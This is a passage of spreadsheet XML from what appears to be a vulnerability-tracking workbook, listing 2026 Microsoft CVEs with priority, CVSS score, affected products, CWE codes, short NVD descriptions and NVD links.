r="T576" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t></is></c></row><row r="577"><c r="A577" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B577" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C577" s="5" t="inlineStr"><is><t>CVE-2026-70289</t></is></c><c r="D577" s="5" t="n"><v>7.8</v></c><c r="E577" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F577" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G577" s="5" t="inlineStr" /><c r="H577" s="5" t="n"><v>0.003</v></c><c r="I577" s="5" t="inlineStr" /><c r="J577" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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7" s="5" t="inlineStr" /><c r="M577" s="5" t="inlineStr" /><c r="N577" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P577" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q577" s="5" t="inlineStr" /><c r="R577" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S577" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T577" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t></is></c></row><row r="578"><c r="A578" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B578" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C578" s="5" t="inlineStr"><is><t>CVE-2026-70334</t></is></c><c r="D578" s="5" t="n"><v>7.8</v></c><c r="E578" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F578" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G578" s="5" t="inlineStr" /><c r="H578" s="5" t="n"><v>0.004</v></c><c r="I578" s="5" t="inlineStr" /><c r="J578" s="5" t="inlineStr" /><c r="K578" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L578" s="5" t="inlineStr" /><c r="M578" s="5" t="inlineStr" /><c r="N578" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P578" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q578" s="5" t="inlineStr" /><c r="R578" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S578" s="5" t="inlineStr"><is><t>Incomplete list of disallowed inputs in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.</t></is></c><c r="T578" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70334</t></is></c></row><row r="579"><c r="A579" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B579" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C579" s="5" t="inlineStr"><is><t>CVE-2026-70564</t></is></c><c r="D579" s="5" t="n"><v>7.8</v></c><c r="E579" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F579" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G579" s="5" t="inlineStr" /><c r="H579" s="5" t="n"><v>0.003</v></c><c r="I579" s="5" t="inlineStr" /><c r="J579" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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79" s="5" t="inlineStr" /><c r="M579" s="5" t="inlineStr" /><c r="N579" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P579" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q579" s="5" t="inlineStr" /><c r="R579" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S579" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T579" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t></is></c></row><row r="580"><c r="A580" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B580" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C580" s="5" t="inlineStr"><is><t>CVE-2026-70569</t></is></c><c r="D580" s="5" t="n"><v>7.8</v></c><c r="E580" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F580" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G580" s="5" t="inlineStr" /><c r="H580" s="5" t="n"><v>0.003</v></c><c r="I580" s="5" t="inlineStr" /><c r="J580" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K580" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L580" s="5" t="inlineStr" /><c r="M580" s="5" t="inlineStr" /><c r="N580" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P580" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q580" s="5" t="inlineStr" /><c r="R580" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S580" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T580" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t></is></c></row><row r="581"><c r="A581" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B581" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C581" s="5" t="inlineStr"><is><t>CVE-2026-70572</t></is></c><c r="D581" s="5" t="n"><v>7.8</v></c><c r="E581" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F581" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G581" s="5" t="inlineStr" /><c r="H581" s="5" t="n"><v>0.003</v></c><c r="I581" s="5" t="inlineStr" /><c r="J581" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K58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81" s="5" t="inlineStr" /><c r="M581" s="5" t="inlineStr" /><c r="N581" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P581" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q581" s="5" t="inlineStr" /><c r="R581" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S581" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T581" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t></is></c></row><row r="582"><c r="A582" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B582" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C582" s="5" t="inlineStr"><is><t>CVE-2026-70574</t></is></c><c r="D582" s="5" t="n"><v>7.8</v></c><c r="E582" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F582" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G582" s="5" t="inlineStr" /><c r="H582" s="5" t="n"><v>0.003</v></c><c r="I582" s="5" t="inlineStr" /><c r="J582" s="5" t="inlineStr" /><c r="K582" s="5" t="inlineStr" /><c r="L582" s="5" t="inlineStr" /><c r="M582" s="5" t="inlineStr" /><c r="N582" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P582" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q582" s="5" t="inlineStr" /><c r="R582" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S582" s="5" t="inlineStr"><is><t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T582" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70574</t></is></c></row><row r="583"><c r="A583" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B583" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C583" s="5" t="inlineStr"><is><t>CVE-2026-70581</t></is></c><c r="D583" s="5" t="n"><v>7.8</v></c><c r="E583" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F583" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G583" s="5" t="inlineStr" /><c r="H583" s="5" t="n"><v>0.003</v></c><c r="I583" s="5" t="inlineStr" /><c r="J583" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K58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83" s="5" t="inlineStr" /><c r="M583" s="5" t="inlineStr" /><c r="N583" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O583" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P583" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q583" s="5" t="inlineStr" /><c r="R583" s="5" t="inlineStr"><is><t>CWE-190, CWE-20</t></is></c><c r="S583" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T583" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t></is></c></row><row r="584"><c r="A584" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B584" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C584" s="5" t="inlineStr"><is><t>CVE-2026-70583</t></is></c><c r="D584" s="5" t="n"><v>7.8</v></c><c r="E584" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F584" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G584" s="5" t="inlineStr" /><c r="H584" s="5" t="n"><v>0.003</v></c><c r="I584" s="5" t="inlineStr" /><c r="J584" s="5" t="inlineStr" /><c r="K584" s="5" t="inlineStr" /><c r="L584" s="5" t="inlineStr" /><c r="M584" s="5" t="inlineStr" /><c r="N584" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O584" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P584" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q584" s="5" t="inlineStr" /><c r="R584" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S584" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T584" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70583</t></is></c></row><row r="585"><c r="A585" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B585" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C585" s="5" t="inlineStr"><is><t>CVE-2026-70584</t></is></c><c r="D585" s="5" t="n"><v>7.8</v></c><c r="E585" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F585" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G585" s="5" t="inlineStr" /><c r="H585" s="5" t="n"><v>0.003</v></c><c r="I585" s="5" t="inlineStr" /><c r="J585" s="5" t="inlineStr" /><c r="K585" s="5" t="inlineStr" /><c r="L585" s="5" t="inlineStr" /><c r="M585" s="5" t="inlineStr" /><c r="N585" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O585" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P585" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q585" s="5" t="inlineStr" /><c r="R585" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S585" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T585" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70584</t></is></c></row><row r="586"><c r="A586" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B586" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C586" s="5" t="inlineStr"><is><t>CVE-2026-71334</t></is></c><c r="D586" s="5" t="n"><v>7.8</v></c><c r="E586" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F586" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G586" s="5" t="inlineStr" /><c r="H586" s="5" t="n"><v>0.002</v></c><c r="I586" s="5" t="inlineStr" /><c r="J586" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K58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86" s="5" t="inlineStr" /><c r="M586" s="5" t="inlineStr" /><c r="N586" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O586" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P586" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q586" s="5" t="inlineStr" /><c r="R586" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S586" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T586" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t></is></c></row><row r="587"><c r="A587" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B587" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C587" s="5" t="inlineStr"><is><t>CVE-2026-71337</t></is></c><c r="D587" s="5" t="n"><v>7.8</v></c><c r="E587" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F587" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G587" s="5" t="inlineStr" /><c r="H587" s="5" t="n"><v>0.003</v></c><c r="I587" s="5" t="inlineStr" /><c r="J587" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K587" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L587" s="5" t="inlineStr" /><c r="M587" s="5" t="inlineStr" /><c r="N587" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P587" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q587" s="5" t="inlineStr" /><c r="R587" s="5" t="inlineStr"><is><t>CWE-121, CWE-130</t></is></c><c r="S587" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T587" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t></is></c></row><row r="588"><c r="A588" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B588" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C588" s="5" t="inlineStr"><is><t>CVE-2026-71343</t></is></c><c r="D588" s="5" t="n"><v>7.8</v></c><c r="E588" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F588" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G588" s="5" t="inlineStr" /><c r="H588" s="5" t="n"><v>0.003</v></c><c r="I588" s="5" t="inlineStr" /><c r="J588" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K58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88" s="5" t="inlineStr" /><c r="M588" s="5" t="inlineStr" /><c r="N588" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O588" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P588" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q588" s="5" t="inlineStr" /><c r="R588" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S588" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t></is></c><c r="T588" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t></is></c></row><row r="589"><c r="A589" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B589" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C589" s="5" t="inlineStr"><is><t>CVE-2026-71345</t></is></c><c r="D589" s="5" t="n"><v>7.8</v></c><c r="E589" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F589" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G589" s="5" t="inlineStr" /><c r="H589" s="5" t="n"><v>0.003</v></c><c r="I589" s="5" t="inlineStr" /><c r="J589" s="5" t="inlineStr" /><c r="K589" s="5" t="inlineStr" /><c r="L589" s="5" t="inlineStr" /><c r="M589" s="5" t="inlineStr" /><c r="N589" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O589" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P589" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q589" s="5" t="inlineStr" /><c r="R589" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S589" s="5" t="inlineStr"><is><t>Out-of-bounds write in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="T589" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71345</t></is></c></row><row r="590"><c r="A590" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B590" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C590" s="5" t="inlineStr"><is><t>CVE-2026-72929</t></is></c><c r="D590" s="5" t="n"><v>7.8</v></c><c r="E590" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F590" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G590" s="5" t="inlineStr" /><c r="H590" s="5" t="n"><v>0.002</v></c><c r="I590" s="5" t="inlineStr" /><c r="J590" s="5" t="inlineStr" /><c r="K590" s="5" t="inlineStr" /><c r="L590" s="5" t="inlineStr" /><c r="M590" s="5" t="inlineStr" /><c r="N590" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O590" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P590" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q590" s="5" t="inlineStr" /><c r="R590" s="5" t="inlineStr"><is><t>CWE-354</t></is></c><c r="S590" s="5" t="inlineStr"><is><t>Improper validation of integrity check value in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T590" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72929</t></is></c></row><row r="591"><c r="A591" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B591" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C591" s="5" t="inlineStr"><is><t>CVE-2026-72941</t></is></c><c r="D591" s="5" t="n"><v>7.8</v></c><c r="E591" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F591" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G591" s="5" t="inlineStr" /><c r="H591" s="5" t="n"><v>0.003</v></c><c r="I591" s="5" t="inlineStr" /><c r="J591" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K59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91" s="5" t="inlineStr" /><c r="M591" s="5" t="inlineStr" /><c r="N591" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O591" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P591" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q591" s="5" t="inlineStr" /><c r="R591" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S591" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T591" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t></is></c></row><row r="592"><c r="A592" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B592" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C592" s="5" t="inlineStr"><is><t>CVE-2026-72944</t></is></c><c r="D592" s="5" t="n"><v>7.8</v></c><c r="E592" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F592" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G592" s="5" t="inlineStr" /><c r="H592" s="5" t="n"><v>0.003</v></c><c r="I592" s="5" t="inlineStr" /><c r="J592" s="5" t="inlineStr" /><c r="K592" s="5" t="inlineStr" /><c r="L592" s="5" t="inlineStr" /><c r="M592" s="5" t="inlineStr" /><c r="N592" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O592" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P592" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q592" s="5" t="inlineStr" /><c r="R592" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S592" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T592" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72944</t></is></c></row><row r="593"><c r="A593" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B593" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C593" s="5" t="inlineStr"><is><t>CVE-2026-72946</t></is></c><c r="D593" s="5" t="n"><v>7.8</v></c><c r="E593" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F593" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G593" s="5" t="inlineStr" /><c r="H593" s="5" t="n"><v>0.003</v></c><c r="I593" s="5" t="inlineStr" /><c r="J593" s="5" t="inlineStr" /><c r="K593" s="5" t="inlineStr" /><c r="L593" s="5" t="inlineStr" /><c r="M593" s="5" t="inlineStr" /><c r="N593" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P593" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q593" s="5" t="inlineStr" /><c r="R593" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S593" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Storage Port Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T593" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72946</t></is></c></row><row r="594"><c r="A594" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B594" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C594" s="5" t="inlineStr"><is><t>CVE-2026-72953</t></is></c><c r="D594" s="5" t="n"><v>7.8</v></c><c r="E594" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F594" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G594" s="5" t="inlineStr" /><c r="H594" s="5" t="n"><v>0.003</v></c><c r="I594" s="5" t="inlineStr" /><c r="J594" s="5" t="inlineStr" /><c r="K594" s="5" t="inlineStr" /><c r="L594" s="5" t="inlineStr" /><c r="M594" s="5" t="inlineStr" /><c r="N594" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P594" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q594" s="5" t="inlineStr" /><c r="R594" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S594" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T594" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72953</t></is></c></row><row r="595"><c r="A595" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B595" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C595" s="5" t="inlineStr"><is><t>CVE-2026-72957</t></is></c><c r="D595" s="5" t="n"><v>7.8</v></c><c r="E595" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F595" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G595" s="5" t="inlineStr" /><c r="H595" s="5" t="n"><v>0.003</v></c><c r="I595" s="5" t="inlineStr" /><c r="J595" s="5" t="inlineStr" /><c r="K595" s="5" t="inlineStr" /><c r="L595" s="5" t="inlineStr" /><c r="M595" s="5" t="inlineStr" /><c r="N595" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O595" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P595" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q595" s="5" t="inlineStr" /><c r="R595" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S595" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Deployment Services allows an authorized attacker to execute code locally.</t></is></c><c r="T595" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72957</t></is></c></row><row r="596"><c r="A596" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B596" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C596" s="5" t="inlineStr"><is><t>CVE-2026-72965</t></is></c><c r="D596" s="5" t="n"><v>7.8</v></c><c r="E596" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F596" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G596" s="5" t="inlineStr" /><c r="H596" s="5" t="n"><v>0.003</v></c><c r="I596" s="5" t="inlineStr" /><c r="J596" s="5" t="inlineStr" /><c r="K596" s="5" t="inlineStr" /><c r="L596" s="5" t="inlineStr" /><c r="M596" s="5" t="inlineStr" /><c r="N596" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q596" s="5" t="inlineStr" /><c r="R596" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S596" s="5" t="inlineStr"><is><t>Use after free in Windows WebClient Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T596" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72965</t></is></c></row><row r="597"><c r="A597" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B597" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C597" s="5" t="inlineStr"><is><t>CVE-2026-72967</t></is></c><c r="D597" s="5" t="n"><v>7.8</v></c><c r="E597" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F597" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G597" s="5" t="inlineStr" /><c r="H597" s="5" t="n"><v>0.003</v></c><c r="I597" s="5" t="inlineStr" /><c r="J597" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K59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597" s="5" t="inlineStr" /><c r="M597" s="5" t="inlineStr" /><c r="N597" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O597" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P597" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q597" s="5" t="inlineStr" /><c r="R597" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S597" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Network Connection Broker allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T597" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72967</t></is></c></row><row r="598"><c r="A598" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B598" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C598" s="5" t="inlineStr"><is><t>CVE-2026-72988</t></is></c><c r="D598" s="5" t="n"><v>7.8</v></c><c r="E598" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F598" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G598" s="5" t="inlineStr" /><c r="H598" s="5" t="n"><v>0.002</v></c><c r="I598" s="5" t="inlineStr" /><c r="J598" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K59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98" s="5" t="inlineStr" /><c r="M598" s="5" t="inlineStr" /><c r="N598" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P598" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q598" s="5" t="inlineStr" /><c r="R598" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S598" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T598" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t></is></c></row><row r="599"><c r="A599" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B599" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C599" s="5" t="inlineStr"><is><t>CVE-2026-72990</t></is></c><c r="D599" s="5" t="n"><v>7.8</v></c><c r="E599" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F599" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G599" s="5" t="inlineStr" /><c r="H599" s="5" t="n"><v>0.003</v></c><c r="I599" s="5" t="inlineStr" /><c r="J599" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K59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599" s="5" t="inlineStr" /><c r="M599" s="5" t="inlineStr" /><c r="N599" s="5" t="inlineStr"><is><t>NVD</t></is></c><c 